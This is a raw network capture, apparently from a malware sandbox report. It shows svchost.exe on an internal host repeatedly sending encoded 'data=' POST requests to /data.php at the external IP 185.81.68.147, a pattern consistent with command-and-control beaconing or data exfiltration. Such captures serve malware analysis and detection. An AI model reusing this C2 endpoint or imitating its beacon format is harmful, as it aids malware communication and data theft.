                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:25.336663008 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:24 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.549740185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:23.652416945 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:05:25.213049889 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:24 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.549747185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:25.454453945 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:05:26.991854906 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:26 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      20192.168.2.549748185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:25.576467037 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:27.262382984 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:26 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      21192.168.2.549749185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:27.239104986 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:05:28.803538084 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:28 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      22192.168.2.549751185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:27.512947083 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:29.193084002 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:28 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      23192.168.2.549757185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:29.347136974 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:05:30.941838980 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:30 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      24192.168.2.549758185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:29.724036932 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:31.405518055 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:30 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      25192.168.2.549764185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:31.187340975 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:05:32.720691919 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:32 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      26192.168.2.549765185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:31.688479900 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:33.443154097 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:32 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      27192.168.2.549771185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:32.950047970 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      28192.168.2.549772185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:33.625363111 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:05:35.153724909 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:34 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      29192.168.2.549773185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:33.640759945 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:35.422909975 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:34 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      30192.168.2.549779185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:35.448354959 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:05:36.992274046 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:36 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      31192.168.2.549780185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:35.747701883 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:37.466387987 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:36 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      32192.168.2.549784185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:37.218184948 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:05:38.771253109 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:38 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      33192.168.2.549785185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:38.041841030 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      34192.168.2.549788185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:39.031235933 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      35192.168.2.549792185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:39.686311960 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:05:41.247416019 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:40 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      36192.168.2.549793185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:39.699892998 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:41.362009048 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:40 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      37192.168.2.549796185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:41.502629042 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
